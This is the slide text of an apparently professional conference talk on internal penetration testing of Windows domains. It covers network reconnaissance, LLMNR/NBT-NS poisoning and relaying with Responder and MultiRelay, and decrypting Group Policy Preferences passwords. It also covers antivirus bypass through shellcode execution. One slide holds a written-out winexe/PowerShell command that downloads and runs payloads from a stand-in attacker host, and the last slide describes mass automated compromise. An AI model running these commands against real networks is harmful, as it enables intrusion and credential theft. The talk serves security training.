3. Internal Pentest From z3r0 to h3r0 – Márcio Almeida
* Disclaimer *
• Slides in english but I’ll speak in
Portuguese.
• That presentation don’t have any tool
created or invented by me, only how I
use "well known" tools and how I can
automatize their use...
• On this presentation I’ll only talk
about ideas and tricks that I
personally use during Internal
penetration test engagements.
3
4. Internal Pentest From z3r0 to h3r0 – Márcio Almeida
whoami
• a.k.a Pimps
• CTF Player (web and crypto)
• Proud Member of TheGoonies CTF Team
• Check our writeups at: https://thegoonies.rocks
• Penetration Tester (+7 years)
• Tempest, Cipher, SpiderLabs and Securus Global
• Previous Presentations
• Black Hat SP, BSides LV, Ekoparty, Thotcon,
AlligatorCon, YSTS…
22/11/16 4
5. Internal Pentest From z3r0 to h3r0 – Márcio Almeida
Scenario we will talk about
• Internal Penetration Testing
• 100% Black Box (Plug and Play)
• Time constriction (3-5 days)
• Without “low-hanging fruits”
• Anti-virus and some other
protections in place
22/11/16 5
6. Internal Pentest From z3r0 to h3r0 – Márcio Almeida
Agenda
• Unfortunately we have only 40m so
I choose:
• Reconnaissance Tricks on Blackbox
Testing
• LLMNR and NBT-NS Poisoning
• GPOs / GPPs
• Shellcode Execution - SCE
6
7. Internal Pentest From z3r0 to h3r0 – Márcio Almeida
RECONNAISSANCE TRICKS ON
BLACKBOX TESTING
7
8. Internal Pentest From z3r0 to h3r0 – Márcio Almeida
Domain Computer Accounts
• First enumerate all Domain Controllers:
• nslookup
• ping domain_name
• dsquery
• Etc…
• Use enum4linux to enumerate all users on the domain
(if null session is enabled or using a cred).
• Extract all machine usernames (accounts with $ on the
username, like: user$)
• Nmap all those userX$.domain_name to get their IP
addresses and open ports. Repeat the nmap process in
all different subnets.
22/11/16 8
9. Internal Pentest From z3r0 to h3r0 – Márcio Almeida
Identifying “Live Subnets”
• You don’t need scan all IPs to
identify live subnets…
• Scan well known IP address with well
known ports to identify live
addresses in subnets:
• x.x.x.1, x.x.x.101, x.x.x.192,
x.x.x.201, x.x.x.253, x.x.x.254
• Scan common ports: 21, 22, 23, 25, 53,
80, 443, 445, 3389
22/11/16 9
10. Internal Pentest From z3r0 to h3r0 – Márcio Almeida
Identifying “Live Hosts”
• Once you find a subnet with a
live IP, then scan the whole
subnet with a tuned nmap command:
• nmap -A -T4 -n -top-ports 1000 --
max-rtt-timeout=500ms --initial-rtt-
timeout=200ms --min-rtt-
timeout=200ms --open --stats-every
5s x.x.x.0/24
22/11/16 10
12. Internal Pentest From z3r0 to h3r0 – Márcio Almeida
LLMNR and NBT-NS Poisoning
• The victim machine wants to go to print server at
printserver, but mistakenly types in pintserver.
• The DNS server responds to the victim saying that it
doesn’t know that host.
• The victim then asks if there is anyone on the local
network that knows the location of pintserver
• The attacker responds to the victim saying that he
actually is the pintserver
• The victim believes the attacker and sends its own
username and NTMLv2 hash to the attacker.
• The attacker can now crack the hash to discover the
password
12
14. Internal Pentest From z3r0 to h3r0 – Márcio Almeida
Responder by @lgandx
https://github.com/lgandx/Responder
• Performs LLMNR/NBT-NS/mDNS poisoning in a
easy and highly effective way and stores the
captured hashes and clear-text credentials
into files.
• Pre-requisites: Install Python
• git clone https://github.com/lgandx/Responder.git
• cd Responder
• ./Responder.py -I eth0 –rPv
• Use john or hashcat to crack the captured NTMLv2 hashes via
dictionary attack… If you don’t have a good wordlist you can
use the rockyou.txt. Works well to me in most ocasions...
14
15. Internal Pentest From z3r0 to h3r0 – Márcio Almeida
DEMO Responder by @lgandx
https://www.youtube.com/watch?v=mgAHX4h1ojI
15
16. Internal Pentest From z3r0 to h3r0 – Márcio Almeida
Responder + Proxenet by @hugsy
https://proxenet.readthedocs.io/en/dev/mitm/
• Use Responder to spoof NetBIOS packets and poison
local network Windows workstation WPAD configuration,
and redirect traffic to our evil box.
• Add the plugin oPhishPoison.py to the autoload
directory of proxenet and start it.
• ln -sf proxenet-plugins/oPhishPoison.py proxenet-
plugins/autoload/oPhishPoison.py
• ./proxenet -b YOUR_IP -p 8008 -i –N
• From the moment proxenet and Responder are configured
and running, fake LLMNR and WPAD responses will be
sent to the victims. By default, the loaded plugin
will replace known binary content types (such as
Office documents, ZIP files, RAR archives, etc.) with
PE executables containing your payloads.
• Please visit the link for detailed configuration.
16
17. Internal Pentest From z3r0 to h3r0 – Márcio Almeida
DEMO Responder + Proxenet by @hugsy
https://www.youtube.com/watch?v=eN_HwFkyYyw
17
19. Internal Pentest From z3r0 to h3r0 – Márcio Almeida
Responder + MultiRelay
http://g-laurent.blogspot.com.br/2016/10/introducing-responder-multirelay-10.html
• MultiRelay was built to work in
conjunction with Responder.py, the
common usage scenario is:
• Set SMB and HTTP to Off in Responder.conf
• ./Responder.py -I eth0 -rv (on one screen)
• ./tools/MultiRelay.py -t Target_IP -u
Administrator/Daaccount/OtherAdmin/ALL (on
another screen).
19
20. Internal Pentest From z3r0 to h3r0 – Márcio Almeida
Responder + MultiRelay
http://g-laurent.blogspot.com.br/2016/10/introducing-responder-multirelay-10.html
• Once a relay has been successful,
MultiRelay will give you an interactive
shell allowing you to:
• Remotely dump the LM and NT hashes on the
target (that you can pass-the-hash after)
• Remotely dump any registry keys under HKLM
(sensitive information and configurations)
• Read any file on the target.
• Download any file on the target.
• Execute any command as System on the target.
20
21. Internal Pentest From z3r0 to h3r0 – Márcio Almeida
MultiRelay DEMO by @lgandx
https://www.youtube.com/watch?v=c5GT9pAtnIw
21
22. Internal Pentest From z3r0 to h3r0 – Márcio Almeida
GPO – GROUP POLICY OBJECT
GPP – GROUP POLICY PROPERTIES
22
23. Internal Pentest From z3r0 to h3r0 – Márcio Almeida
Group Policies (GPO)
• SYSVOL is a share present on the Domain
Controllers to which all authenticated
users have read access.
• SYSVOL contains logon scripts, group
policy data, and other domain-wide data
which needs to be available anywhere.
• All domain Group Policies are stored
here:
• <DOMAIN_CONTROLLER>SYSVOL<DOMAIN_NAME>Policies
23
24. Internal Pentest From z3r0 to h3r0 – Márcio Almeida
24
Clear-text Credentials on SYSVOL
25. Internal Pentest From z3r0 to h3r0 – Márcio Almeida
Group Policy Preferences (GPP)
• In 2006, Microsoft Bought Desktop Standard’s
“PolicyMaker” which they re-branded & released
with Windows Server 2008 as “Group Policy
Preferences.”
• One of the most useful features of Group Policy
Preferences (GPP) is the ability to store and use
credentials in several scenarios (change local
admin password, configure prints, configure
shares, configure services, etc).
• Those credentials are stored Encrypted. They are
encrypted with AES-256 which should be good
enough… But…
25
26. Internal Pentest From z3r0 to h3r0 – Márcio Almeida
Thanks Microsoft ;-*
26
https://msdn.microsoft.com/en-us/library/cc422924.aspx
27. Internal Pentest From z3r0 to h3r0 – Márcio Almeida
Decrypting GPP cpassword
27
https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1
root@kali:~# gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
Local*P4ssword!
30. Internal Pentest From z3r0 to h3r0 – Márcio Almeida
Shellcode Execution - SCE
• HIGHLY EFFECTIVE for anti-virus bypass
• My own experience: worked perfectly 100% of the
times that I needed use.
• Works beautifully using winexe or psexec (God
bless the Pass the Hash :-P)
• Using a Domain Admin account is possible
automatize the Mass p0wn4g3 on the network
“scripting” the command reading the targets from
a list.
• Using a Meterpreter script you can also
automatize the capture of evidences on all
compromised machines (screenshot, ifconfig,
hashdump, mimikatz, getinfo, etc…)
30
31. Internal Pentest From z3r0 to h3r0 – Márcio Almeida
Shellcode Execution - SCE
• Using Microsoft PowerShell is possible download
the binary (wget like style) to a temporary
directory, execute it and erase the file after:
• On Attacker machine execute: python –m
SimpleHTTPServer
• Will enable http://YOUR_MACHINE:8000/ on Attacker
machine
• winexe --user=DOMAIN/USER%HASH_OR_PASSWORD //TARGET
"cmd /c "del teste.bat & echo powershell -c "(new-
object
System.Net.WebClient).DownloadFile('http://YOUR_MACHINE
:8000/sce.32.exe','sce.32.exe')" >> teste.bat & echo
powershell -c "(new-object
System.Net.WebClient).DownloadFile('http://YOUR_MACHINE
:8000/hack.bat','hack.bat')" >> teste.bat & echo
hack.bat >> teste.bat & teste.bat""
31
32. Internal Pentest From z3r0 to h3r0 – Márcio Almeida
SCEPWN-NG by @joshuaskorich
https://github.com/joshuaskorich/scepwn-ng
• Using a samba share you can execute the binary
directly from the sharing folder injecting the
meterpreter session directly on memory without any
file ever touch the disk!
• Details of how configure the environment on
scepwn-ng github.
• After configure your environment, and get a
privileged account, just execute:
• ./scepwn-ng.rb -u 'username%password_or_hash' -t TARGET
• If you put this command in a loop to read from a list
of targets and use a Meterpreter script to automatize
commands on targets, it becomes a mass auto-pwn tool.
32